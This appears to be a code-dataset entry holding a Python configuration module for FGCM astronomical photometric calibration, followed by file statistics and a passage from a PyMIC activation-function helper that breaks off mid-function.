|
2020-02-12T16:36:27.000Z
|
import numpy as np
import os
import sys
import yaml
from .fgcmUtilities import FocalPlaneProjectorFromOffsets
from .fgcmLogger import FgcmLogger
class ConfigField(object):
"""
A validatable field with a default
"""
def __init__(self, datatype, value=None, default=None, required=False, length=None):
self._datatype = datatype
self._value = value
self._required = required
self._length = length
_default = default
if self._datatype == np.ndarray:
if default is not None:
_default = np.atleast_1d(default)
if value is not None:
self._value = np.atleast_1d(value)
if datatype is not None:
if _default is not None:
if type(_default) != datatype:
raise TypeError("Default is the wrong datatype.")
if self._value is not None:
if type(self._value) != datatype:
raise TypeError("Value is the wrong datatype.")
if self._value is None:
self._value = _default
def __get__(self, obj, type=None):
return self._value
def __set__(self, obj, value):
# need to convert to numpy array if necessary
if self._datatype == np.ndarray:
self._value = np.atleast_1d(value)
else:
self._value = value
def validate(self, name):
if self._required:
if self._value is None:
raise ValueError("Required ConfigField %s is not set" % (name))
elif self._value is None:
# Okay to have None for not required
return True
if self._datatype is not None:
if type(self._value) != self._datatype:
raise ValueError("Datatype mismatch for %s (got %s, expected %s)" %
(name, str(type(self._value)), str(self._datatype)))
if self._length is not None:
if len(self._value) != self._length:
raise ValueError("ConfigField %s has the wrong length (%d != %d)" %
(name, len(self._value), self._length))
return True
class FgcmConfig(object):
"""
Class which contains the FGCM Configuration. Note that if you have fits files
as input, use configWithFits(configDict) to initialize.
parameters
----------
configDict: dict
Dictionary with configuration values
lutIndex: numpy recarray
All the information from the LUT index values
lutStd: numpy recarray
All the information from the LUT standard values
expInfo: numpy recarray
Info about each exposure
checkFiles: bool, default=False
Check that all fits files exist
noOutput: bool, default=False
Do not create an output directory.
ccdOffsets : `np.ndarray`, optional
CCD Offset table.
focalPlaneProjector : `FocalPlaneProjector`, optional
A focal plane projector object to generate the
focal plane mapping at an arbitrary angle.
"""
bands = ConfigField(list, required=True)
fitBands = ConfigField(list, required=True)
notFitBands = ConfigField(list, required=True)
requiredBands = ConfigField(list, required=True)
filterToBand = ConfigField(dict, required=True)
exposureFile = ConfigField(str, required=False)
ccdOffsetFile = ConfigField(str, required=False)
obsFile = ConfigField(str, required=False)
indexFile = ConfigField(str, required=False)
refstarFile = ConfigField(str, required=False)
UTBoundary = ConfigField(float, default=0.0)
washMJDs = ConfigField(np.ndarray, default=np.array((0.0)))
epochMJDs = ConfigField(np.ndarray, default=np.array((0.0, 1e10)))
coatingMJDs = ConfigField(np.ndarray, default=np.array((0.0)))
epochNames = ConfigField(list, required=False)
lutFile = ConfigField(str, required=False)
expField = ConfigField(str, default='EXPNUM')
ccdField = ConfigField(str, default='CCDNUM')
latitude = ConfigField(float, required=True)
defaultCameraOrientation = ConfigField(float, default=0.0)
seeingField = ConfigField(str, default='SEEING')
seeingSubExposure = ConfigField(bool, default=False)
deepFlag = ConfigField(str, default='DEEPFLAG')
fwhmField = ConfigField(str, default='PSF_FWHM')
skyBrightnessField = ConfigField(str, default='SKYBRIGHTNESS')
minObsPerBand = ConfigField(int, default=2)
minObsPerBandFill = ConfigField(int, default=1)
nCore = ConfigField(int, default=1)
randomSeed = ConfigField(int, required=False)
logger = ConfigField(None, required=False)
outputFgcmcalZpts = ConfigField(bool, default=False)
brightObsGrayMax = ConfigField(float, default=0.15)
minStarPerCCD = ConfigField(int, default=5)
minStarPerExp = ConfigField(int, default=100)
minCCDPerExp = ConfigField(int, default=5)
maxCCDGrayErr = ConfigField(float, default=0.05)
ccdGraySubCCDDict = ConfigField(dict, default={})
ccdGraySubCCDChebyshevOrder = ConfigField(int, default=1)
ccdGraySubCCDTriangular = ConfigField(bool, default=True)
ccdGrayFocalPlaneDict = ConfigField(dict, default={})
ccdGrayFocalPlaneChebyshevOrder = ConfigField(int, default=3)
focalPlaneSigmaClip = ConfigField(float, default=4.0)
ccdGrayFocalPlaneFitMinCcd = ConfigField(int, default=1)
aperCorrFitNBins = ConfigField(int, default=5)
aperCorrInputSlopeDict = ConfigField(dict, default={})
illegalValue = ConfigField(float, default=-9999.0)
sedBoundaryTermDict = ConfigField(dict, required=True)
sedTermDict = ConfigField(dict, required=True)
starColorCuts = ConfigField(list, required=True)
quantityCuts = ConfigField(list, default=[])
cycleNumber = ConfigField(int, default=0)
outfileBase = ConfigField(str, required=True)
maxIter = ConfigField(int, default=50)
deltaMagBkgOffsetPercentile = ConfigField(float, default=0.25)
deltaMagBkgPerCcd = ConfigField(bool, default=False)
sigFgcmMaxErr = ConfigField(float, default=0.01)
sigFgcmMaxEGrayDict = ConfigField(dict, default={})
ccdGrayMaxStarErr = ConfigField(float, default=0.10)
mirrorArea = ConfigField(float, required=True) # cm^2
cameraGain = ConfigField(float, required=True)
approxThroughputDict = ConfigField(dict, default={})
ccdStartIndex = ConfigField(int, default=0)
minExpPerNight = ConfigField(int, default=10)
expGrayInitialCut = ConfigField(float, default=-0.25)
expVarGrayPhotometricCutDict = ConfigField(dict, default={})
expGrayPhotometricCutDict = ConfigField(dict, required=True)
expGrayRecoverCut = ConfigField(float, default=-1.0)
expGrayHighCutDict = ConfigField(dict, required=True)
expGrayErrRecoverCut = ConfigField(float, default=0.05)
sigmaCalRange = ConfigField(list, default=[0.001, 0.003], length=2)
sigmaCalFitPercentile = ConfigField(list, default=[0.05, 0.15], length=2)
sigmaCalPlotPercentile = ConfigField(list, default=[0.05, 0.95], length=2)
sigma0Phot = ConfigField(float, default=0.003)
logLevel = ConfigField(str, default='INFO')
quietMode = ConfigField(bool, default=False)
useRepeatabilityForExpGrayCutsDict = ConfigField(dict, default={})
mapLongitudeRef = ConfigField(float, default=0.0)
autoPhotometricCutNSig = ConfigField(float, default=3.0)
autoPhotometricCutStep = ConfigField(float, default=0.0025)
autoHighCutNSig = ConfigField(float, default=4.0)
instrumentParsPerBand = ConfigField(bool, default=False)
instrumentSlopeMinDeltaT = ConfigField(float, default=5.0)
refStarSnMin = ConfigField(float, default=20.0)
refStarOutlierNSig = ConfigField(float, default=4.0)
applyRefStarColorCuts = ConfigField(bool, default=True)
useRefStarsWithInstrument = ConfigField(bool, default=True)
mapNSide = ConfigField(int, default=256)
nStarPerRun = ConfigField(int, default=200000)
nExpPerRun = ConfigField(int, default=1000)
varNSig = ConfigField(float, default=100.0)
varMinBand = ConfigField(int, default=2)
useSedLUT = ConfigField(bool, default=False)
modelMagErrors = ConfigField(bool, default=False)
freezeStdAtmosphere = ConfigField(bool, default=False)
reserveFraction = ConfigField(float, default=0.1)
precomputeSuperStarInitialCycle = ConfigField(bool, default=False)
useRetrievedPwv = ConfigField(bool, default=False)
useNightlyRetrievedPwv = ConfigField(bool, default=False)
useQuadraticPwv = ConfigField(bool, default=False)
pwvRetrievalSmoothBlock = ConfigField(int, default=25)
fitMirrorChromaticity = ConfigField(bool, default=False)
useRetrievedTauInit = ConfigField(bool, default=False)
tauRetrievalMinCCDPerNight = ConfigField(int, default=100)
superStarSubCCDDict = ConfigField(dict, default={})
superStarSubCCDChebyshevOrder = ConfigField(int, default=1)
superStarSubCCDTriangular = ConfigField(bool, default=False)
superStarSigmaClip = ConfigField(float, default=5.0)
clobber = ConfigField(bool, default=False)
printOnly = ConfigField(bool, default=False)
outputStars = ConfigField(bool, default=False)
fillStars = ConfigField(bool, default=False)
outputZeropoints = ConfigField(bool, default=False)
outputPath = ConfigField(str, required=False)
saveParsForDebugging = ConfigField(bool, default=False)
doPlots = ConfigField(bool, default=True)
pwvFile = ConfigField(str, required=False)
externalPwvDeltaT = ConfigField(float, default=0.1)
tauFile = ConfigField(str, required=False)
externalTauDeltaT = ConfigField(float, default=0.1)
fitGradientTolerance = ConfigField(float, default=1e-5)
stepUnitReference = ConfigField(float, default=0.0001)
experimentalMode = ConfigField(bool, default=False)
resetParameters = ConfigField(bool, default=True)
noChromaticCorrections = ConfigField(bool, default=False)
colorSplitBands = ConfigField(list, default=['g', 'i'], length=2)
expGrayCheckDeltaT = ConfigField(float, default=10. / (24. * 60.))
modelMagErrorNObs = ConfigField(int, default=100000)
inParameterFile = ConfigField(str, required=False)
inFlagStarFile = ConfigField(str, required=False)
zpsToApplyFile = ConfigField(str, required=False)
maxFlagZpsToApply = ConfigField(int, default=2)
def __init__(self, configDict, lutIndex, lutStd, expInfo, checkFiles=False, noOutput=False, ccdOffsets=None, focalPlaneProjector=None):
self._setVarsFromDict(configDict)
self._setDefaultLengths()
self.validate()
# First thing: set the random seed if desired
if self.randomSeed is not None:
np.random.seed(seed=self.randomSeed)
if self.outputPath is None:
self.outputPath = os.path.abspath('.')
else:
self.outputPath = os.path.abspath(self.outputPath)
# create output path if necessary
if not noOutput:
if (not os.path.isdir(self.outputPath)):
try:
os.makedirs(self.outputPath)
except:
raise IOError("Could not create output path: %s" % (self.outputPath))
if (self.cycleNumber < 0):
raise ValueError("Illegal cycleNumber: must be >= 0")
self.inParameterFile = None
self.inFlagStarFile = None
if (self.cycleNumber >= 1) and checkFiles:
if ('inParameterFile' not in configDict):
raise ValueError("Must provide inParameterFile for cycleNumber > 0")
self.inParameterFile = configDict['inParameterFile']
if ('inFlagStarFile' not in configDict):
raise ValueError("Must provide inFlagStarFile for cycleNumber > 0")
self.inFlagStarFile = configDict['inFlagStarFile']
# check the cut values
self.outfileBaseWithCycle = '%s_cycle%02d' % (self.outfileBase, self.cycleNumber)
logFile = '%s/%s.log' % (self.outputPath, self.outfileBaseWithCycle)
if os.path.isfile(logFile) and not self.clobber:
raise RuntimeError("Found logFile %s, but clobber == False." % (logFile))
self.plotPath = None
if self.doPlots:
self.plotPath = '%s/%s_plots' % (self.outputPath,self.outfileBaseWithCycle)
if os.path.isdir(self.plotPath) and not self.clobber:
# check if directory is empty
if len(os.listdir(self.plotPath)) > 0:
raise RuntimeError("Found plots in %s, but clobber == False." % (self.plotPath))
# set up logger are we get the name...
if ('logger' not in configDict):
self.externalLogger = False
self.fgcmLog = FgcmLogger('%s/%s.log' % (self.outputPath,
self.outfileBaseWithCycle),
self.logLevel, printLogger=configDict['printOnly'])
if configDict['printOnly']:
self.fgcmLog.info('Logging to console')
else:
self.fgcmLog.info('Logging started to %s' % (self.fgcmLog.logFile))
else:
# Support an external logger such as LSST that has .info() and .debug() calls
self.externalLogger = True
self.fgcmLog = configDict['logger']
try:
if not self.quietMode:
self.fgcmLog.info('Logging to external logger.')
except:
raise RuntimeError("Logging to configDict['logger'] failed.")
if (self.experimentalMode) :
self.fgcmLog.info('ExperimentalMode set to True')
if (self.resetParameters) :
self.fgcmLog.info('Will reset atmosphere parameters')
if (self.noChromaticCorrections) :
self.fgcmLog.warning('No chromatic corrections will be applied. I hope this is what you wanted for a test!')
if (self.plotPath is not None and not os.path.isdir(self.plotPath)):
try:
os.makedirs(self.plotPath)
except:
raise IOError("Could not create plot path: %s" % (self.plotPath))
if (self.illegalValue >= 0.0):
raise ValueError("Must set illegalValue to a negative number")
# and look at the lutFile
self.nCCD = lutIndex['NCCD'][0]
# these are np arrays and encoded as such
try:
self.lutFilterNames = [n.decode('utf-8') for n in lutIndex['FILTERNAMES'][0]]
except AttributeError:
self.lutFilterNames = [n for n in lutIndex['FILTERNAMES'][0]]
try:
self.lutStdFilterNames = [n.decode('utf-8') for n in lutIndex['STDFILTERNAMES'][0]]
except AttributeError:
self.lutStdFilterNames = [n for n in lutIndex['STDFILTERNAMES'][0]]
self.pmbRange = np.array([np.min(lutIndex['PMB']),np.max(lutIndex['PMB'])])
self.pwvRange = np.array([np.min(lutIndex['PWV']),np.max(lutIndex['PWV'])])
self.O3Range = np.array([np.min(lutIndex['O3']),np.max(lutIndex['O3'])])
self.tauRange = np.array([np.min(lutIndex['TAU']),np.max(lutIndex['TAU'])])
self.alphaRange = np.array([np.min(lutIndex['ALPHA']),np.max(lutIndex['ALPHA'])])
self.zenithRange = np.array([np.min(lutIndex['ZENITH']),np.max(lutIndex['ZENITH'])])
# newer band checks
# 1) check that all the filters in filterToBand are in lutFilterNames
# 2) check that all the lutStdFilterNames are lutFilterNames (redundant)
# 3) check that each band has ONE standard filter
# 4) check that all the fitBands are in bands
# 5) check that all the notFitBands are in bands
# 6) check that all the requiredBands are in bands
# 1) check that all the filters in filterToBand are in lutFilterNames
for filterName in self.filterToBand:
if filterName not in self.lutFilterNames:
raise ValueError("Filter %s in filterToBand not in LUT" % (filterName))
# 2) check that all the lutStdFilterNames are lutFilterNames (redundant)
for lutStdFilterName in self.lutStdFilterNames:
if lutStdFilterName not in self.lutFilterNames:
raise ValueError("lutStdFilterName %s not in list of lutFilterNames" % (lutStdFilterName))
# 3) check that each band has ONE standard filter
bandStdFilterIndex = np.zeros(len(self.bands), dtype=np.int32) - 1
for i, band in enumerate(self.bands):
for j, filterName in enumerate(self.lutFilterNames):
# Not every LUT filter must be in the filterToBand mapping.
# If it is not there, it will not be used.
if filterName in self.filterToBand:
if self.filterToBand[filterName] == band:
# If we haven't found it yet, set the index
ind = list(self.lutFilterNames).index(self.lutStdFilterNames[j])
if bandStdFilterIndex[i] < 0:
bandStdFilterIndex[i] = ind
else:
if self.lutStdFilterNames[ind] != self.lutStdFilterNames[bandStdFilterIndex[i]]:
raise ValueError("Band %s has multiple standard filters (%s, %s)" %
(band, self.lutStdFilterNames[ind],
self.lutStdFilterNames[bandStdFilterIndex[i]]))
# 4) check that all the fitBands are in bands
for fitBand in self.fitBands:
if fitBand not in self.bands:
raise ValueError("Band %s from fitBands not in full bands" % (fitBand))
# 5) check that all the notFitBands are in bands
for notFitBand in self.notFitBands:
if notFitBand not in self.bands:
raise ValueError("Band %s from notFitBands not in full bands" % (notFitBand))
# 6) check that all the requiredBands are in bands
for requiredBand in self.requiredBands:
if requiredBand not in self.bands:
raise ValueError("Band %s from requiredBands not in full bands" % (requiredBand))
bandString = " ".join(self.bands)
self.fgcmLog.info('Found %d CCDs and %d bands (%s)' %
(self.nCCD,len(self.bands),bandString))
# get LUT standard values
self.pmbStd = lutStd['PMBSTD'][0]
self.pwvStd = lutStd['PWVSTD'][0]
self.lnPwvStd = np.log(lutStd['PWVSTD'][0])
self.o3Std = lutStd['O3STD'][0]
self.tauStd = lutStd['TAUSTD'][0]
self.lnTauStd = np.log(lutStd['TAUSTD'][0])
self.alphaStd = lutStd['ALPHASTD'][0]
self.zenithStd = lutStd['ZENITHSTD'][0]
# Cut the LUT filter names to those that are actually used
usedFilterNames = self.filterToBand.keys()
usedLutFilterMark = np.zeros(len(self.lutFilterNames), dtype=bool)
for i, f in enumerate(self.lutFilterNames):
if f in usedFilterNames:
usedLutFilterMark[i] = True
self.lutFilterNames = [f for i, f in enumerate(self.lutFilterNames) if usedLutFilterMark[i]]
self.lutStdFilterNames = [f for i, f in enumerate(self.lutStdFilterNames) if usedLutFilterMark[i]]
# And the lambdaStd and I10Std, for each *band*
self.lambdaStdBand = lutStd['LAMBDASTD'][0][bandStdFilterIndex]
self.I10StdBand = lutStd['I10STD'][0][bandStdFilterIndex]
self.I0StdBand = lutStd['I0STD'][0][bandStdFilterIndex]
self.I1StdBand = lutStd['I1STD'][0][bandStdFilterIndex]
self.I2StdBand = lutStd['I2STD'][0][bandStdFilterIndex]
self.lambdaStdFilter = lutStd['LAMBDASTDFILTER'][0][usedLutFilterMark]
# Convert maps to lists...
self.ccdGraySubCCD = self._convertDictToBandList(self.ccdGraySubCCDDict,
bool, False, required=False)
self.ccdGrayFocalPlane = self._convertDictToBandList(self.ccdGrayFocalPlaneDict,
bool, False, required=False)
self.superStarSubCCD = self._convertDictToBandList(self.superStarSubCCDDict,
bool, False, required=False)
self.aperCorrInputSlopes = self._convertDictToBandList(self.aperCorrInputSlopeDict,
float, self.illegalValue,
ndarray=True, required=False)
self.sigFgcmMaxEGray = self._convertDictToBandList(self.sigFgcmMaxEGrayDict,
float, 0.05, required=False)
self.approxThroughput = self._convertDictToBandList(self.approxThroughputDict,
float, 1.0, required=False)
self.expVarGrayPhotometricCut = self._convertDictToBandList(self.expVarGrayPhotometricCutDict,
float, 0.0005,
ndarray=True, required=False)
self.expGrayPhotometricCut = self._convertDictToBandList(self.expGrayPhotometricCutDict,
float, -0.05,
ndarray=True, required=True,
dictName='expGrayPhotometricCutDict')
self.expGrayHighCut = self._convertDictToBandList(self.expGrayHighCutDict,
float, 0.10,
ndarray=True, required=True,
dictName='expGrayHighCutDict')
self.useRepeatabilityForExpGrayCuts = self._convertDictToBandList(self.useRepeatabilityForExpGrayCutsDict,
bool, False, required=False)
if self.colorSplitBands[0] not in self.bands or self.colorSplitBands[1] not in self.bands:
raise RuntimeError("Bands listed in colorSplitBands must be valid bands.")
self.colorSplitIndices = [self.bands.index(x) for x in self.colorSplitBands]
if (self.expGrayPhotometricCut.max() >= 0.0):
raise ValueError("expGrayPhotometricCut must all be negative")
if (self.expGrayHighCut.max() <= 0.0):
raise ValueError("expGrayHighCut must all be positive")
if self.sigmaCalRange[1] < self.sigmaCalRange[0]:
raise ValueError("sigmaCalRange[1] must me equal to or larger than sigmaCalRange[0]")
# and look at the exposure file and grab some stats
self.expRange = np.array([np.min(expInfo[self.expField]),np.max(expInfo[self.expField])])
self.mjdRange = np.array([np.min(expInfo['MJD']),np.max(expInfo['MJD'])])
self.nExp = expInfo.size
if ccdOffsets is None and focalPlaneProjector is None:
raise ValueError("Must supply either ccdOffsets or focalPlaneProjector")
elif ccdOffsets is not None and focalPlaneProjector is not None:
raise ValueError("Must supply only one of ccdOffsets or focalPlaneProjector")
elif focalPlaneProjector is not None:
self.focalPlaneProjector = focalPlaneProjector
else:
# Use old ccd offsets, so create a translator
self.focalPlaneProjector = FocalPlaneProjectorFromOffsets(ccdOffsets)
# based on mjdRange, look at epochs; also sort.
# confirm that we cover all the exposures, and remove excess epochs
# are they sorted?
if (self.epochMJDs != np.sort(self.epochMJDs)).any():
raise ValueError("epochMJDs must be sorted in ascending order")
test=np.searchsorted(self.epochMJDs,self.mjdRange)
if test.min() == 0:
self.fgcmLog.warning("Exposure start MJD before epoch range. Adding additional epoch.")
self.epochMJDs = np.insert(self.epochMJDs, 0, self.mjdRange[0] - 1.0)
if self.epochNames is not None:
self.epochNames.insert(0, 'epoch-pre')
if test.max() == self.epochMJDs.size:
self.fgcmLog.warning("Exposure end MJD after epoch range. Adding additional epoch.")
self.epochMJDs = np.insert(self.epochMJDs, len(self.epochMJDs), self.mjdRange[1] + 1.0)
if self.epochNames is not None:
self.epochNames.insert(len(self.epochNames), 'epoch-post')
if self.epochNames is None:
self.epochNames = []
for i in range(self.epochMJDs.size):
self.epochNames.append('epoch%d' % (i))
# crop to valid range
self.epochMJDs = self.epochMJDs[test[0]-1:test[1]+1]
self.epochNames = self.epochNames[test[0]-1:test[1]+1]
# and look at washMJDs; also sort
st=np.argsort(self.washMJDs)
if (not np.array_equal(st,np.arange(self.washMJDs.size))):
raise ValueError("Input washMJDs must be in sort order.")
gd,=np.where((self.washMJDs > self.mjdRange[0]) &
(self.washMJDs < self.mjdRange[1]))
self.washMJDs = self.washMJDs[gd]
# and the coating MJDs
st = np.argsort(self.coatingMJDs)
if (not np.array_equal(st, np.arange(self.coatingMJDs.size))):
raise ValueError("Input coatingMJDs must be in sort order.")
gd, = np.where((self.coatingMJDs > self.mjdRange[0]) &
(self.coatingMJDs < self.mjdRange[1]))
self.coatingMJDs = self.coatingMJDs[gd]
# Deal with fit band, notfit band, required, and notrequired indices
bandFitFlag = np.zeros(len(self.bands), dtype=bool)
bandNotFitFlag = np.zeros_like(bandFitFlag)
bandRequiredFlag = np.zeros_like(bandFitFlag)
for i, band in enumerate(self.bands):
if band in self.fitBands:
bandFitFlag[i] = True
if band in self.requiredBands:
bandRequiredFlag[i] = True
if len(self.notFitBands) > 0:
if band in self.notFitBands:
bandNotFitFlag[i] = True
if band in self.fitBands and band in self.notFitBands:
raise ValueError("Cannot have the same band in fitBands and notFitBands")
self.bandFitIndex = np.where(bandFitFlag)[0]
self.bandNotFitIndex = np.where(bandNotFitFlag)[0]
self.bandRequiredIndex = np.where(bandRequiredFlag)[0]
self.bandNotRequiredIndex = np.where(~bandRequiredFlag)[0]
if np.array_equal(self.bandFitIndex, self.bandRequiredIndex):
self.allFitBandsAreRequired = True
else:
self.allFitBandsAreRequired = False
# and check the star color cuts and replace with indices...
# note that self.starColorCuts is a copy so that we don't overwrite.
for cCut in self.starColorCuts:
if (not isinstance(cCut[0],int)) :
if (cCut[0] not in self.bands):
raise ValueError("starColorCut band %s not in list of bands!" % (cCut[0]))
cCut[0] = list(self.bands).index(cCut[0])
if (not isinstance(cCut[1],int)) :
if (cCut[1] not in self.bands):
raise ValueError("starColorCut band %s not in list of bands!" % (cCut[1]))
cCut[1] = list(self.bands).index(cCut[1])
# Check for input aperture corrections.
if self.aperCorrFitNBins == 0 and np.any(self.aperCorrInputSlopes == self.illegalValue):
self.fgcmLog.warning("Aperture corrections will not be fit; strongly recommend setting aperCorrInputSlopeDict")
# Check the sed mapping dictionaries
# First, make sure every band is listed in the sedTermDict
for band in self.bands:
if band not in self.sedTermDict:
raise RuntimeError("Band %s not listed in sedTermDict." % (band))
# Second, make sure sedBoundaryTermDict is correct format
for boundaryTermName, boundaryTerm in self.sedBoundaryTermDict.items():
if 'primary' not in boundaryTerm or 'secondary' not in boundaryTerm:
raise RuntimeError("sedBoundaryTerm %s must have primary and secondary keys." % (boundaryTerm))
if boundaryTerm['primary'] not in self.bands:
raise RuntimeError("sedBoundaryTerm %s band %s not in list of bands." %
(boundaryTermName, boundaryTerm['primary']))
if boundaryTerm['secondary'] not in self.bands:
raise RuntimeError("sedBoundaryTerm %s band %s not in list of bands." %
(boundaryTermName, boundaryTerm['secondary']))
# Third, extract all the terms and bands from sedTermDict, make sure all
# are defined.
mapBands = []
mapTerms = []
for band in self.sedTermDict:
sedTerm = self.sedTermDict[band]
if 'extrapolated' not in sedTerm:
raise RuntimeError("sedTermDict %s must have 'extrapolated' key." % (band))
if 'constant' not in sedTerm:
raise RuntimeError("sedTermDict %s must have 'constant' key." % (band))
if 'primaryTerm' not in sedTerm:
raise RuntimeError("sedTermDict %s must have a primaryTerm." % (band))
if 'secondaryTerm' not in sedTerm:
raise RuntimeError("sedTermDict %s must have a secondaryTerm." % (band))
mapTerms.append(sedTerm['primaryTerm'])
if sedTerm['secondaryTerm'] is not None:
mapTerms.append(sedTerm['secondaryTerm'])
if sedTerm['extrapolated']:
if sedTerm['secondaryTerm'] is None:
raise RuntimeError("sedTermDict %s must have a secondaryTerm if extrapolated." % (band))
if 'primaryBand' not in sedTerm:
raise RuntimeError("sedTermDict %s must have a primaryBand if extrapolated." % (band))
if 'secondaryBand' not in sedTerm:
raise RuntimeError("sedTermDict %s must have a secondaryBand if extrapolated." % (band))
if 'tertiaryBand' not in sedTerm:
raise RuntimeError("sedTermDict %s must have a tertiaryBand if extrapolated." % (band))
mapBands.append(sedTerm['primaryBand'])
mapBands.append(sedTerm['secondaryBand'])
mapBands.append(sedTerm['tertiaryBand'])
for mapTerm in mapTerms:
if mapTerm not in self.sedBoundaryTermDict:
raise RuntimeError("Term %s is used in sedTermDict but not in sedBoundaryTermDict" % (mapTerm))
for mapBand in mapBands:
if mapBand not in self.bands:
raise RuntimeError("Band %s is used in sedTermDict but not in bands" % (mapBand))
# and AB zeropoint
self.hPlanck = 6.6
self.expPlanck = -27.0
self.zptABNoThroughput = (-48.6 - 2.5 * self.expPlanck +
2.5 * np.log10(self.mirrorArea) -
2.5 * np.log10(self.hPlanck * self.cameraGain))
self.fgcmLog.info("AB offset (w/o throughput) estimated as %.4f" % (self.zptABNoThroughput))
self.configDictSaved = configDict
## FIXME: add pmb scaling?
def updateCycleNumber(self, newCycleNumber):
"""
Update the cycle number for re-use of config.
Parameters
----------
newCycleNumber: `int`
"""
self.cycleNumber = newCycleNumber
self.outfileBaseWithCycle = '%s_cycle%02d' % (self.outfileBase, self.cycleNumber)
logFile = '%s/%s.log' % (self.outputPath, self.outfileBaseWithCycle)
if os.path.isfile(logFile) and not self.clobber:
raise RuntimeError("Found logFile %s, but clobber == False." % (logFile))
self.plotPath = None
if self.doPlots:
self.plotPath = '%s/%s_plots' % (self.outputPath,self.outfileBaseWithCycle)
if os.path.isdir(self.plotPath) and not self.clobber:
# check if directory is empty
if len(os.listdir(self.plotPath)) > 0:
raise RuntimeError("Found plots in %s, but clobber == False." % (self.plotPath))
if not self.externalLogger:
self.fgcmLog = FgcmLogger('%s/%s.log' % (self.outputPath,
self.outfileBaseWithCycle),
self.logLevel, printLogger=configDict['printOnly'])
if (self.plotPath is not None and not os.path.isdir(self.plotPath)):
try:
os.makedirs(self.plotPath)
except:
raise IOError("Could not create plot path: %s" % (self.plotPath))
@staticmethod
def _readConfigDict(configFile):
"""
Internal method to read a configuration dictionary from a yaml file.
"""
with open(configFile) as f:
configDict = yaml.load(f, Loader=yaml.SafeLoader)
print("Configuration read from %s" % (configFile))
return configDict
@classmethod
def configWithFits(cls, configDict, noOutput=False):
"""
Initialize FgcmConfig object and read in fits files.
parameters
----------
configDict: dict
Dictionary with config variables.
noOutput: bool, default=False
Do not create output directory.
"""
import fitsio
expInfo = fitsio.read(configDict['exposureFile'], ext=1)
try:
lutIndex = fitsio.read(configDict['lutFile'], ext='INDEX')
lutStd = fitsio.read(configDict['lutFile'], ext='STD')
except:
raise IOError("Could not read LUT info")
ccdOffsets = fitsio.read(configDict['ccdOffsetFile'], ext=1)
return cls(configDict, lutIndex, lutStd, expInfo, checkFiles=True, noOutput=noOutput, ccdOffsets=ccdOffsets)
def saveConfigForNextCycle(self,fileName,parFile,flagStarFile):
"""
Save a yaml configuration file for the next fit cycle (using fits files).
Parameters
----------
fileName: string
Config file filename
parFile: string
File with saved parameters from previous cycle
flagStarFile: string
File with flagged stars from previous cycle
"""
configDict = self.configDictSaved.copy()
# save the outputPath
configDict['outputPath'] = self.outputPath
# update the cycleNumber
configDict['cycleNumber'] = self.cycleNumber + 1
# default to NOT freeze atmosphere
configDict['freezeStdAtmosphere'] = False
# do we want to increase maxIter? Hmmm.
configDict['inParameterFile'] = parFile
configDict['inFlagStarFile'] = flagStarFile
# And update the photometric cuts...
# These need to be converted to lists of floats
for i, b in enumerate(self.bands):
configDict['expGrayPhotometricCutDict'][b] = float(self.expGrayPhotometricCutDict[b])
configDict['expGrayHighCutDict'][b] = float(self.expGrayHighCutDict[b])
with open(fileName,'w') as f:
yaml.dump(configDict, stream=f)
def _setVarsFromDict(self, d):
for key in d:
if key not in type(self).__dict__:
raise AttributeError("Unknown config variable: %s" % (key))
setattr(self, key, d[key])
def validate(self):
"""
"""
for var in type(self).__dict__:
try:
type(self).__dict__[var].validate(var)
except AttributeError:
pass
def _setDefaultLengths(self):
"""
"""
pass
def _convertDictToBandList(self, inputDict, dtype, default,
required=False, ndarray=False, dictName=''):
"""
Convert an input dict into a list or ndarray in band order.
Parameters
----------
inputDict : `dict`
Input dictionary
dtype : `type`
Type of array
default : value of dtype
Default value
ndarray : `bool`, optional
Return ndarray (True) or list (False)
required : `bool`, optional
All bands are required?
dictName: `str`, optional
Name of dict for error logging. Should be set if required is True.
Returns
-------
bandOrderedList : `ndarray` or `list`
"""
if ndarray:
retval = np.zeros(len(self.bands), dtype=dtype) + default
else:
retval = [default]*len(self.bands)
if required:
for band in self.bands:
if band not in inputDict:
raise RuntimeError("All bands must be listed in %s" % (dictName))
for i, band in enumerate(self.bands):
if band in inputDict:
retval[i] = inputDict[band]
return retval
| 46.063882
| 139
| 0.618759
| 3,909
| 37,496
| 5.91251
| 0.168074
| 0.008437
| 0.027864
| 0.026869
| 0.261552
| 0.194358
| 0.17333
| 0.157061
| 0.135774
| 0.1009
| 0
| 0.011802
| 0.285897
| 37,496
| 813
| 140
| 46.120541
| 0.851359
| 0.114839
| 0
| 0.153707
| 0
| 0
| 0.111762
| 0.002851
| 0
| 0
| 0
| 0.00123
| 0
| 1
| 0.023508
| false
| 0.003617
| 0.012658
| 0.001808
| 0.287523
| 0.009042
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a33e4ece404ced51ee4f1506f207476b0d455c63
| 2,398
|
py
|
Python
|
pymic/layer/activation.py
|
vincentme/PyMIC
|
5cbbca7d0a19232be647086d4686ceea523f45ee
|
[
"Apache-2.0"
] | 147
|
2019-12-23T02:52:04.000Z
|
2022-03-06T16:30:43.000Z
|
pymic/layer/activation.py
|
vincentme/PyMIC
|
5cbbca7d0a19232be647086d4686ceea523f45ee
|
[
"Apache-2.0"
] | 4
|
2020-12-18T12:47:21.000Z
|
2021-05-21T02:18:01.000Z
|
pymic/layer/activation.py
|
vincentme/PyMIC
|
5cbbca7d0a19232be647086d4686ceea523f45ee
|
[
"Apache-2.0"
] | 32
|
2020-01-08T13:48:50.000Z
|
2022-03-12T06:31:13.000Z
|
# -*- coding: utf-8 -*-
from __future__ import print_function, division
import torch
import torch.nn as nn
def get_acti_func(acti_func, params):
acti_func = acti_func.lower()
if(acti_func == 'relu'):
inplace = params.get('relu_inplace', False)
return nn.ReLU(inplace)
elif(acti_func == 'leakyrelu'):
slope = params.get('leakyrelu_negative_slope', 1e-2)
inplace = params.get('leakyrelu_inplace', False)
return nn.LeakyReLU(slope, inplace)
elif(acti_func == 'prelu'):
num_params = params.get('prelu_num_parameters', 1)
init_value = params.get('prelu_init', 0.25)
return nn.PReLU(num_params, init_value)
elif(acti_func == 'rrelu'):
lower = params.get('rrelu_lower', 1.0 /8)
upper = params.get('rrelu_upper', 1.0 /3)
inplace = params.get('rrelu_inplace', False)
return nn.RReLU(lower, upper, inplace)
elif(acti_func == 'elu'):
